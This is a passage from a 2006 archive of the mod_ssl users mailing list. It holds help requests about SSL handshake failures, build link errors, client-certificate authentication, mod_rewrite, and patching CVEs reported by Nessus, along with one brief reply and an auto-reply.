myserver.com:4430,=20
client 109.4.71.56)


 


Any =
help is=20
appreciated.


TIA





------_=_NextPart_001_01C68E9D.965949B9--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 22 13:52:47 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8E46814D8B0; Thu, 22 Jun 2006 13:52:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ug-out-1314.google.com (ug-out-1314.google.com [66.249.92.171])
	by master.modssl.org (Postfix) with ESMTP id 5FD0614D875
	for ; Thu, 22 Jun 2006 13:52:46 +0200 (CEST)
Received: by ug-out-1314.google.com with SMTP id s2so425495uge
        for ; Thu, 22 Jun 2006 04:52:40 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=FdKZXpKob2qPP/idLG6mlSAe9UwWi3zV6c3S8rcTqlypvJeTPky7zJq8ohftIFycu+6ZHSBxyohibIVa/62RzHq9RCFXHr5mNPhzvM5u2/xv9D0oEVsWE88CicBQokROqEYiWV7cUoV1caRgXlTIxXhLZmMtMytJdzplqrGGK/U=
Received: by 10.67.24.13 with SMTP id b13mr999952ugj;
        Thu, 22 Jun 2006 04:45:39 -0700 (PDT)
Received: by 10.66.237.2 with HTTP; Thu, 22 Jun 2006 04:45:38 -0700 (PDT)
Message-ID: <463d0d930606220445l55253fa3q791be6c76d78fb42@mail.gmail.com>
Date: Thu, 22 Jun 2006 13:45:38 +0200
From: "Pascal C. Kocher" 
To: modssl-users@modssl.org
Subject: apache and mod_ssl sending close_notify and getting XMLHTTP on IE out of sync
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pascal C. Kocher" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello all

In my environment a reverse proxy using apache (and mod_ssl) secures
the frontend server. Server is Apache 1.3.35 with mod_ssl 2.8.26, openssl 0.9.8a

The problem arises when using OWA and checking names in the mail being
sent. IE uses XMLHTTP to make asynchronious lookups of the username to
the backend resulting in a POST through the SSL channel.

Before the problem arises, mod_ssl sends an SSL alert (close_notify)
to the browser and closes the connection. When the users checks the
names in OWA now, the XMLHTTP still tries to send through the
previously closed SSL channel, to no avail of course.

Is there a possibility to stop mod_ssl from closing the SSL channel or
can anybody point me into the right direction.

Best regards,
Pascal.

PS: I have traces if needed (snoop and ssldump)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 22 14:02:44 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B974614D8B0; Thu, 22 Jun 2006 14:02:44 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ug-out-1314.google.com (ug-out-1314.google.com [66.249.92.171])
	by master.modssl.org (Postfix) with ESMTP id 46E8F14D875
	for ; Thu, 22 Jun 2006 14:02:43 +0200 (CEST)
Received: by ug-out-1314.google.com with SMTP id s2so429367uge
        for ; Thu, 22 Jun 2006 05:02:38 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=Mmq7xoXejo57Kv8jvABuFYYlqMUZCvbgrI6s+8ssQZUpfVZ/TPg8764Fcs+nrOtCXmUAy6P/4OQEhhNgPDgSUCNuk07IDchKSjm3db823EuJXVt2qczNvulGt+s8nLZTX4RxRm3BAS6CO1+4u0egmR+s+81890F+iGfPiaK03WQ=
Received: by 10.67.93.7 with SMTP id v7mr958222ugl;
        Thu, 22 Jun 2006 03:57:02 -0700 (PDT)
Received: by 10.66.237.2 with HTTP; Thu, 22 Jun 2006 03:57:02 -0700 (PDT)
Message-ID: <463d0d930606220357nab737dbud39d47c620cc1e7f@mail.gmail.com>
Date: Thu, 22 Jun 2006 12:57:02 +0200
From: "Pascal C. Kocher" 
To: modssl-users@modssl.org
Subject: apach3 and mod_ssl sending close_notify and getting XMLHTTP on IE out of sync
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pascal C. Kocher" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello all

In my environment a reverse proxy using apache (and mod_ssl) secures
the frontend server.

The problem arises when using OWA and checking names in the mail being
sent. IE uses XMLHTTP to make asynchronious lookups of the username to
the backend resulting in a POST through the SSL channel.

Before the problem arises, mod_ssl sends an SSL alert (close_notify)
to the browser and closes the connection. When the users checks the
names in OWA now, the XMLHTTP still tries to send through the
previously closed SSL channel, to no avail of course.

Is there a possibility to stop mod_ssl from closing the SSL channel or
can anybody point me into the right direction.

Best regards,
Pascal.

PS: I have traces if needed (snoop and ssldump)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 23 10:00:47 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2FAD514D84A; Fri, 23 Jun 2006 10:00:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cernmxlb.cern.ch (cernmx06.cern.ch [137.138.166.160])
	by master.modssl.org (Postfix) with ESMTP id C460E14D829
	for ; Fri, 23 Jun 2006 10:00:46 +0200 (CEST)
Keywords: CERN SpamKiller Note: -49 Charset: west-latin
X-Filter: CERNMX06 CERN MX v2.0 051012.1312 Release
Received: from cernfe02.cern.ch ([137.138.28.243]) by cernmxlb.cern.ch with Microsoft SMTPSVC(6.0.3790.1830);
	 Fri, 23 Jun 2006 10:00:37 +0200
Received: from lxplus007.cern.ch ([137.138.5.74]) by cernfe02.cern.ch over TLS secured channel with Microsoft SMTPSVC(6.0.3790.1830);
	 Fri, 23 Jun 2006 10:00:38 +0200
Date: Fri, 23 Jun 2006 10:00:37 +0200 (CEST)
From: Arsen Hayrapetyan 
X-X-Sender: ahairape@lxplus007.cern.ch
To: modssl-users@modssl.org
Subject: modssl intsllation problem
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-OriginalArrivalTime: 23 Jun 2006 08:00:38.0505 (UTC) FILETIME=[1D76A590:01C6969B]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Arsen Hayrapetyan 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I am trying to install mod_ssl-2.8.27-1.3.36
and I've faced the following problem when I do 'make' in the
the directory where the apache's source resides:

....
gcc  -DLINUX=22 -DHAVE_SET_DUMPABLE -DMOD_SSL=208127 -DUSE_HSREGEX -DEAPI 
-DNO_DL_NEEDED `./apaci` -L/home/ahairape/prereqs/openssl-0.9.8b   \
      -o httpd buildmark.o modules.o modules/standard/libstandard.a 
modules/ssl/libssl.a main/libmain.a ./os/unix/libos.a ap/libap.a 
regex/libregex.a   -lm -lcrypt  -lssl -lcrypto -lexpat
/home/ahairape/prereqs/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x35): 
In function `dlfcn_load':
: undefined reference to `dlopen'
/home/ahairape/prereqs/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x95): 
In function `dlfcn_load':
: undefined reference to `dlclose'
/home/ahairape/prereqs/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0xbc): 
In function `dlfcn_load':
: undefined reference to `dlerror'
/home/ahairape/prereqs/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x147): 
In function `dlfcn_bind_var':
: undefined reference to `dlsym'
/home/ahairape/prereqs/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x172): 
In function `dlfcn_bind_var':
: undefined reference to `dlerror'
/home/ahairape/prereqs/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x237): 
In function `dlfcn_bind_func':
: undefined reference to `dlsym'
/home/ahairape/prereqs/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x262): 
In function `dlfcn_bind_func':
: undefined reference to `dlerror'
/home/ahairape/prereqs/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x52b): 
In function `dlfcn_unload':
: undefined reference to `dlclose'

___________________________________________________________________________

I've done the following pre-installations:

openssl-0.9.8
apache-1.3.36

And I am following instructions in INSTALL file of mod_ssl to
configure it:

cd mod_ssl-2.8.27-1.3.36
./configure --with-apache=/home/cawebuser/apache_1.3.36 \ 
--with-ssl=/home/ahairape/prereqs/openssl-0.9.8b \
 --prefix=/usr/local/apache-1.3.36

[Here '/home/ahairape/prereqs/openssl-0.9.8b'
is the directory where I've unpacked openssl,
'/home/cawebuser/apache_1.3.36' is the directory
where I've unpacked apache and
/usr/local/apache-1.3.36 is the directory 
where the apache is installed]

cd /home/cawebuser/apache_1.3.36
make


Can anybody tell me the solution to this problem?

Thank you in advance,
Arsen.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 27 03:02:20 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2877514D86D; Tue, 27 Jun 2006 03:02:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [70.61.80.18])
	by master.modssl.org (Postfix) with ESMTP id 29DE014D850
	for ; Tue, 27 Jun 2006 03:02:18 +0200 (CEST)
Received: from blackhole.sysinfo.com (blackhole.sysinfo.com [70.61.80.19])
	by darkstar.sysinfo.com (8.13.7/8.12.11) with ESMTP id k5R14fMn007043;
	Mon, 26 Jun 2006 21:04:46 -0400
Date: Mon, 26 Jun 2006 21:04:38 -0400 (EDT)
From: "R. DuFresne" 
To: Arsen Hayrapetyan 
cc: modssl-users@modssl.org
Subject: Re: modssl intsllation problem
In-Reply-To: 
Message-ID: 
References: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Fri, 23 Jun 2006, Arsen Hayrapetyan wrote:

> Hello,
>
> I am trying to install mod_ssl-2.8.27-1.3.36
> and I've faced the following problem when I do 'make' in the
> the directory where the apache's source resides:
>
> ....
> gcc  -DLINUX=22 -DHAVE_SET_DUMPABLE -DMOD_SSL=208127 -DUSE_HSREGEX -DEAPI
> -DNO_DL_NEEDED `./apaci` -L/home/ahairape/prereqs/openssl-0.9.8b   \
>      -o httpd buildmark.o modules.o modules/standard/libstandard.a
> modules/ssl/libssl.a main/libmain.a ./os/unix/libos.a ap/libap.a
> regex/libregex.a   -lm -lcrypt  -lssl -lcrypto -lexpat
> /home/ahairape/prereqs/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x35):
> In function `dlfcn_load':
> : undefined reference to `dlopen'
> /home/ahairape/prereqs/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x95):
> In function `dlfcn_load':
> : undefined reference to `dlclose'
> /home/ahairape/prereqs/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0xbc):
> In function `dlfcn_load':
> : undefined reference to `dlerror'
> /home/ahairape/prereqs/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x147):
> In function `dlfcn_bind_var':
> : undefined reference to `dlsym'
> /home/ahairape/prereqs/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x172):
> In function `dlfcn_bind_var':
> : undefined reference to `dlerror'
> /home/ahairape/prereqs/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x237):
> In function `dlfcn_bind_func':
> : undefined reference to `dlsym'
> /home/ahairape/prereqs/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x262):
> In function `dlfcn_bind_func':
> : undefined reference to `dlerror'
> /home/ahairape/prereqs/openssl-0.9.8b/libcrypto.a(dso_dlfcn.o)(.text+0x52b):
> In function `dlfcn_unload':
> : undefined reference to `dlclose'
>
> ___________________________________________________________________________
>
> I've done the following pre-installations:
>
> openssl-0.9.8


I thnk yer error rests here.  One makes apache and mod-ssl together and 
installs/configs as one application with a module loaded.

> apache-1.3.36
>
> And I am following instructions in INSTALL file of mod_ssl to
> configure it:
>
> cd mod_ssl-2.8.27-1.3.36
> ./configure --with-apache=/home/cawebuser/apache_1.3.36 \
> --with-ssl=/home/ahairape/prereqs/openssl-0.9.8b \
> --prefix=/usr/local/apache-1.3.36
>
> [Here '/home/ahairape/prereqs/openssl-0.9.8b'
> is the directory where I've unpacked openssl,
> '/home/cawebuser/apache_1.3.36' is the directory
> where I've unpacked apache and
> /usr/local/apache-1.3.36 is the directory
> where the apache is installed]
>
> cd /home/cawebuser/apache_1.3.36
> make
>
>
> Can anybody tell me the solution to this problem?
>


Thanks,


Ron DuFresne
- -- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         admin & senior security consultant:  sysinfo.com
                         http://sysinfo.com
Key fingerprint = 9401 4B13 B918 164C 647A  E838 B2DF AFCC 94B0 6629

...We waste time looking for the perfect lover
instead of creating the perfect love.

                 -Tom Robbins 
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFEoIQost+vzJSwZikRApeAAKCOluoPwYNnVTfopjcdJ8GD4bxU9gCfe9Ns
uk5X6+qNGrDDxevv2SGU1IQ=
=SyPP
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul  1 02:05:59 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6935C14D876; Sat,  1 Jul 2006 02:05:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from perlworks1.perlworks.com (perlworks.com [67.19.116.218])
	by master.modssl.org (Postfix) with ESMTP id 042B914D83A
	for ; Sat,  1 Jul 2006 02:05:57 +0200 (CEST)
Received: from perlwork by perlworks1.perlworks.com with local (Exim 4.52)
	id 1FwSzf-0006Jr-Mo
	for modssl-users@modssl.org; Fri, 30 Jun 2006 19:05:51 -0500
Received: from 127.0.0.1 ([127.0.0.1])
        (SquirrelMail authenticated user modssl@perlworks.com)
        by perlworks.com with HTTP;
        Fri, 30 Jun 2006 19:05:51 -0500 (CDT)
Message-ID: <60606.127.0.0.1.1151712351.squirrel@perlworks.com>
Date: Fri, 30 Jun 2006 19:05:51 -0500 (CDT)
Subject: Client SSL authentication on Apache + mod_ssl
From: modssl@perlworks.com
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.4
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - perlworks1.perlworks.com
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [32008 32009] / [47 12]
X-AntiAbuse: Sender Address Domain - perlworks.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl@perlworks.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am required to have our apache server using PKI client authentication
by the end of July.

I have set up a test server with the latest and greatest

Apache/2.2.2 (Unix)
mod_ssl/2.2.2
OpenSSL/0.9.7

I have set up a ssl.conf using

SSLVerifyClient require
SSLVerifyDepth  10

and populated a CA certification file and enabled

SSLCACertificateFile /usr/local/apache2/conf/dod_ca_bundle.crt

On start the logs (set to debug) show the dod_ca_bundle.crt file being
read in properly

---------------------- log output begin ---------------------
ssl_engine_init.c(405): Creating new SSL context (protocols: SSLv2,
SSLv3, TLSv1)
ssl_engine_init.c(538): Configuring client authentication
ssl_engine_init.c(1113): CA certificate: /C=US/O=U.S.
Government/OU=DoD/OU=PKI/CN=DOD CLASS 3 CA-10
ssl_engine_init.c(1113): CA certificate: /C=US/O=U.S.
Government/OU=DoD/OU=PKI/CN=DoD CLASS 3 Root CA
ssl_engine_init.c(601): Configuring permitted SSL ciphers
[ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL]
-------------------------- log output end -----------------------------

However, when attempting to connect with IE nothing is returned. The
pertinent log out looks like

---------------------- log output begin ---------------------
ssl_engine_kernel.c(1752): OpenSSL: Handshake: start
ssl_engine_kernel.c(1760): OpenSSL: Loop: before/accept initialization
ssl_engine_io.c(1775): OpenSSL: read 11/11 bytes from BIO#918b100 [mem:
9192780] (BIO dump follows)
:
:
ssl_engine_kernel.c(1760): OpenSSL: Loop: SSLv3 read client hello A
ssl_engine_kernel.c(1760): OpenSSL: Loop: SSLv3 write server hello A
ssl_engine_kernel.c(1760): OpenSSL: Loop: SSLv3 write certificate A
ssl_engine_kernel.c(1760): OpenSSL: Loop: SSLv3 write certificate
request A
ssl_engine_kernel.c(1760): OpenSSL: Loop: SSLv3 flush data
-------------------------- log output end -----------------------------

Looks like the next line indicates a problem:

---------------------- log output begin ---------------------
ssl_engine_io.c(1786): OpenSSL: I/O error, 5 bytes expected to read on
BIO #918b100 [mem: 9192780]
ssl_engine_kernel.c(1789): OpenSSL: Exit: error in SSLv3 read client
certificate A
ssl_engine_kernel.c(1789): OpenSSL: Exit: error in SSLv3 read client
certificate A
[client 157.187.160.114] (70014)End of file found: SSL handshake
interrupted by system [Hint: Stop button pressed in browser?!]
-------------------------- log output end -----------------------------

Any help with this problem would be greatly appreciated.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul  1 04:02:14 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C9EC614D876; Sat,  1 Jul 2006 04:02:14 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from frfcqmg011ix3r8.montpellier.mebs.ihost.com (mail2.aspaway.fr [129.35.163.230])
	by master.modssl.org (Postfix) with ESMTP id 5EA2914D83A
	for ; Sat,  1 Jul 2006 04:02:13 +0200 (CEST)
Received: from frfcqws071ix328.infra.montpellier.mebs.ihost.com ([10.0.77.8])
	by frfcqmg011ix3r8.montpellier.mebs.ihost.com (8.12.11/8.12.11) with ESMTP id k6121YBa030888
	for ; Sat, 1 Jul 2006 04:01:35 +0200
Subject: Jean-Pierre Guilloteau est absent.
From: jpguilloteau@aspaway.fr
To: modssl-users@modssl.org
Message-ID: 
Date: Sat, 1 Jul 2006 04:01:37 +0200
X-MIMETrack: Serialize by Router on MES01ASP/SRV/ASPAWAY(603HF91 | October 29, 2003) at
 07/01/2006 04:01:38 AM
MIME-Version: 1.0
Content-type: text/plain; charset=ISO-8859-1
Content-transfer-encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jpguilloteau@aspaway.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





Je serai absent(e) du  01/07/2006 au 24/07/2006.

Je r=E9pondrai =E0 votre message d=E8s mon retour.
Vous pouvez en mon absence contacter Aspaway au 01 46 67 88 88.
Cordialement.=


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul  2 22:55:05 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5631814D88D; Sun,  2 Jul 2006 22:55:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from atalos.com (cust210-35.dsl.versadsl.be [62.166.210.35])
	by master.modssl.org (Postfix) with SMTP id 148C914D84A
	for ; Sun,  2 Jul 2006 22:55:04 +0200 (CEST)
Received: (qmail 27691 invoked by uid 1009); 2 Jul 2006 20:54:56 -0000
Date: Sun, 2 Jul 2006 22:54:56 +0200
From: FTP 
To: modssl-users@modssl.org
Subject: SSL in Apache 1.3.26 on OpenBSD 3.9
Message-ID: <20060702205456.GA7091@atalos.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.2i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: FTP 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I tried to set up a 1.3.26 Apache in a OpenBSD 3.9 box with SSL and a self-signed cert but when trying to access the sever via firefox I get an error.

When I try to access the site via lynx, I do get an SSL error message moaning that I have a self-signed cert. After accepting this, the page gets dispalyed.

How can I have Apache to operate in SSL mode with a self-signed cert?

Thanks

George
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 18 03:05:12 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2856014D87D; Tue, 18 Jul 2006 03:05:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nf-out-0910.google.com (nf-out-0910.google.com [64.233.182.184])
	by master.modssl.org (Postfix) with ESMTP id DB91914D82B
	for ; Tue, 18 Jul 2006 03:05:09 +0200 (CEST)
Received: by nf-out-0910.google.com with SMTP id m18so4675nfc
        for ; Mon, 17 Jul 2006 18:04:58 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type;
        b=CE4Wu6qsvI7pmGy6V2ERu5IGym8pSavImolUBRfYvKYUKsl47hT+n8M9LaKmlri0lj9Z0PxUB3oNIJG75ZYs1Patj+vxxupaMIsFbH6SEiwbxfogWL2/Ek4Y00zDC0Gm7kqB2LZ6mcAIvGjEWHF+TFRRb/Vj3WcQpBqIA2XMZAU=
Received: by 10.78.170.17 with SMTP id s17mr1207592hue;
        Mon, 17 Jul 2006 18:04:58 -0700 (PDT)
Received: by 10.78.83.7 with HTTP; Mon, 17 Jul 2006 18:04:58 -0700 (PDT)
Message-ID: 
Date: Mon, 17 Jul 2006 18:04:58 -0700
From: "Octavia Yung" 
To: modssl-users@modssl.org
Subject: mod_rewrite - silent redirect
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_22628_22006463.1153184698270"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Octavia Yung" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_22628_22006463.1153184698270
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

hello there!

hopefully, i am posting to the correct area.  i am currently having troubles
with mod_rewrite in an apache 2 environment.  i would like to hide the "abc"
directory. the following code works:

*** CODE SNIPPET ***
Options +FollowSymLinks
RewriteEngine On

RewriteRule !^abc(/.*)?$ /abc/index.php%{REQUEST_URI} [R,L]
*** CODE SNIPPET ***

but this code does not. it will only redirect to index.php when the "R" is
removed.  does this have something to do with ssl (https://) issues?

*** CODE SNIPPET ***
Options +FollowSymLinks
RewriteEngine On

RewriteRule !^abc(/.*)?$ /abc/index.php%{REQUEST_URI} [L]
*** CODE SNIPPET ***

your time and help is greatly appreciated!  thanks much in advance!

------=_Part_22628_22006463.1153184698270
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

hello there!

hopefully, i am posting to the correct area.  i am currently having troubles with mod_rewrite in an apache 2 environment.  i would like to hide the "abc" directory.  the following code works:




*** CODE SNIPPET ***
Options +FollowSymLinks
RewriteEngine On


RewriteRule !^abc(/.*)?$ /abc/index.php%{REQUEST_URI} [R,L]



*** CODE SNIPPET ***


but this code does not.  it will only redirect to index.php when the "R" is removed.  does this have something to do with ssl (https://) issues?

*** CODE SNIPPET ***

Options +FollowSymLinks

RewriteEngine On




RewriteRule !^abc(/.*)?$ /abc/index.php%{REQUEST_URI} [L]



*** CODE SNIPPET ***


your time and help is greatly appreciated!  thanks much in advance!  

------=_Part_22628_22006463.1153184698270--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 21 14:41:43 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C599414D85F; Fri, 21 Jul 2006 14:41:43 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wip-ectls-mx3.wipro.com (wip-ectls-mx3.wipro.com [203.91.193.23])
	by master.modssl.org (Postfix) with ESMTP id 711DA14D831
	for ; Fri, 21 Jul 2006 14:41:42 +0200 (CEST)
Received: from wip-ectls-mx3.wipro.com (localhost.localdomain [127.0.0.1])
	by localhost (Postfix) with ESMTP id 419D322446A
	for ; Fri, 21 Jul 2006 18:11:30 +0530 (IST)
Received: from blr-ec-bh02.wipro.com (blr-ec-bh02.wipro.com [10.201.50.92])
	by wip-ectls-mx3.wipro.com (Postfix) with ESMTP id 356E0224086
	for ; Fri, 21 Jul 2006 18:11:30 +0530 (IST)
Received: from BLR-EC-MBX02.wipro.com ([10.201.50.162]) by blr-ec-bh02.wipro.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Fri, 21 Jul 2006 18:11:29 +0530
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: Mod_ssl 2.8.16 security patches.
Date: Fri, 21 Jul 2006 18:11:12 +0530
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Mod_ssl 2.8.16 security patches.
Thread-Index: Acasw0yM9/b4NqUbSvaaA34S1lRRLg==
From: 
To: 
X-OriginalArrivalTime: 21 Jul 2006 12:41:29.0862 (UTC) FILETIME=[FD38AA60:01C6ACC2]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



Hi All,

Thanks.=0D


This is regarding mod_ssl 2.8.16 security vulnerabilities.

We use mod_ssl-2.8.16 . Nessus tool reported few security vulnerability.

1) CVE : CVE-2004-0488  BID : 10355 Other references : OSVDB:6472

2) CVE : CVE-2004-0700  BID : 10736
3) CVE : CVE-2004-0488  BID : 10355 Other references : OSVDB:6472

Upgrading to newer mod_ssl version involves lot of effort. So we are
looking for 2.8.16 patches.=0D
Where are the 2.8.16 patches for above bugs?.=0D
=0D

Thanks for your assistance.

Madhu K.S.


The information contained in this electronic message and any attachments to=
 this message are intended for the exclusive use of the addressee(s) and=
 may contain proprietary, confidential or privileged information. If you=
 are not the intended recipient, you should not disseminate, distribute or=
 copy this e-mail. Please notify the sender immediately and destroy all=
 copies of this message and any attachments.=0D

WARNING: Computer viruses can be transmitted via email. The recipient=
 should check this email and any attachments for the presence of viruses.=
 The company accepts no liability for any damage caused by any virus=
 transmitted by this email.
=0D
www.wipro.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
